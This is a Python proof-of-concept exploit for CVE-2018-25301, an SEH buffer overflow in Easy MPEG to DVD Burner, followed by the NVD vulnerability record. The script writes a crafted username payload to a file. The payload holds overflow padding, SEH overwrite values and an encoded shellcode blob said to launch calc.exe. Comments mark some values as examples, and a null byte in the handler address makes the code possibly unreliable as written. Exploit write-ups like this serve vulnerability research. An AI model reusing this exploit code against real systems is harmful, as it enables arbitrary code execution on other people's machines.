CVE-2018-25301

#!/usr/bin/env python # PoC for CVE-2018-25301 - Easy MPEG to DVD Burner SEH Overflow # Offset to overwrite SEH structure (Example value) offset = 4104 # "pop pop ret" instruction address to bypass SEH # Note: This address depends on the OS version and application modules seh_handler = "\x57\x20\x40\x00" # Jump instruction to skip the SEH handler and land in shellcode # \xeb\x06 is JMP SHORT +6 next_seh = "\xeb\x06\x90\x90" # Shellcode to execute calc.exe (Example) # This is a standard metasploit windows/exec payload shellcode = ("\xd9\xc4\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42" "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75" "\x4a\x49\x4b\x4c\x4d\x38\x4b\x59\x5a\x45\x4f\x4d\x38\x49\x55" "\x47\x4c\x43\x30\x45\x50\x4c\x49\x4d\x55\x47\x34\x4c\x4b" "\x51\x46\x50\x44\x4c\x4b\x51\x56\x44\x44\x4c\x4b\x52\x46" "\x54\x34\x4c\x4b\x52\x46\x47\x50\x4c\x4b\x51\x46\x44\x44" "\x4c\x4b\x52\x56\x51\x56\x4c\x4b\x44\x46\x50\x30\x4c\x4b" "\x51\x5a\x55\x4c\x4c\x4d\x4c\x45\x4b\x69\x4a\x58\x46\x44" "\x4e\x31\x4b\x4a\x44\x4c\x4a\x50\x49\x4c\x4c\x4a\x4d\x49" "\x50\x42\x54\x45\x57\x49\x51\x48\x4f\x44\x4f\x48\x4d\x49" "\x51\x47\x55\x4f\x4c\x4d\x50\x53\x4b\x4d\x4c\x30\x43\x45" "\x4f\x4b\x47\x37\x43\x35\x51\x48\x4f\x44\x4f\x48\x4d\x4b" "\x4f\x43\x45\x4f\x4b\x4c\x30\x48\x35\x49\x58\x45\x4e\x4d" "\x30\x43\x45\x4a\x54\x50\x50\x4c\x49\x4e\x48\x4b\x39\x4a" "\x46\x46\x30\x50\x56\x4a\x4f\x4e\x48\x4f\x55\x49\x58\x45" "\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54\x4b\x4f\x4e\x36\x46" "\x32\x4b\x4f\x50\x55\x45\x4c\x45\x36\x51\x4c\x4d\x34\x4a" "\x4c\x45\x50\x4a\x4c\x4d\x34\x49\x58\x44\x4c\x4b\x39\x4c" "\x54\x42\x44\x45\x4c\x4e\x4a\x4b\x39\x4e\x36\x46\x54\x46" "\x34\x51\x39\x50\x54\x4c\x4b\x51\x46\x50\x30\x4c\x4b\x51" "\x50\x44\x4c\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x50\x30\x47" "\x4c\x4e\x4d\x4c\x4b\x43\x58\x47\x58\x4a\x4f\x48\x59\x4c" "\x55\x4e\x34\x46\x51\x48\x49\x4a\x44\x4d\x33\x51\x4d\x4a" "\x4b\x4f\x4b\x4f\x4b\x4f\x4f\x4f\x49\x4f\x4e\x4f\x4d\x30" "\x4c\x4c\x4d\x30\x50\x44\x51\x5a\x45\x51\x48\x4f\x44\x4f" "\x48\x4d\x48\x35\x48\x56\x4a\x36\x4e\x33\x45\x36\x4a\x58" "\x50\x49\x49\x4f\x49\x4f\x49\x4f\x45\x30\x45\x38\x43\x4e" "\x48\x45\x51\x44\x43\x53\x4d\x59\x4a\x42\x45\x31\x49\x52" "\x4a\x4f\x43\x44\x51\x4b\x51\x4b\x4b\x4f\x48\x50\x42\x48" "\x51\x4e\x46\x36\x43\x35\x49\x52\x4a\x4f\x43\x44\x45\x51" "\x48\x4f\x44\x4f\x48\x4d\x4f\x4f\x4f\x4f\x4b\x4f\x4e\x4f" "\x4b\x39") # Padding to align payload padding = "\x90" * 20 # Construct the final payload payload = "A" * offset + next_seh + seh_handler + padding + shellcode try: with open("exploit.txt", "w") as f: f.write(payload) print("[+] Payload created successfully in 'exploit.txt'") print("[+] Length: %d" % len(payload)) except: print("[-] Error creating file.")

{"cve": {"id": "CVE-2018-25301", "sourceIdentifier": "[email protected]", "published": "2026-04-29T20:16:25.320", "lastModified": "2026-04-30T15:44:48.290", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Easy MPEG to DVD Burner 1.7.11 contains a structured exception handling (SEH) local buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious username string. Attackers can craft a payload containing junk data, SEH chain pointers, and shellcode that overwrites the SEH handler to redirect execution and run arbitrary commands like opening calc.exe."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-120"}]}], "references": [{"url": "https://downloads.tomsguide.com/MPEG-Easy-Burner,0301-10418.html", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/44565", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/easy-mpeg-to-dvd-burner-seh-local-buffer-overflow", "source": "[email protected]"}]}}